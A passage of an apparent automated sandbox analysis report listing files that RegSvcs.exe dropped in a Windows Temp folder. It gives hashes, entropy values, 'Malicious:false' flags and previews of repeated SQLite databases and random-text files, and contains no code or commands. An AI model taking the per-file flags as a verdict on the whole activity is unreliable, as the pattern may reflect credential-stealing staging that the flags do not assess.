                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                      C:\Users\user\AppData\Local\Temp\tmp6C9F.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                      C:\Users\user\AppData\Local\Temp\tmp7F1B.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp7F3C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp7F5C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp7F6C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp8063.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp8073.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp8084.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp8095.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp80A5.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp80B6.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp80B7.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp80C8.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp92D8.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp92D9.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp92F9.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp930A.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp931A.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp932B.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp933C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp9AA2.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
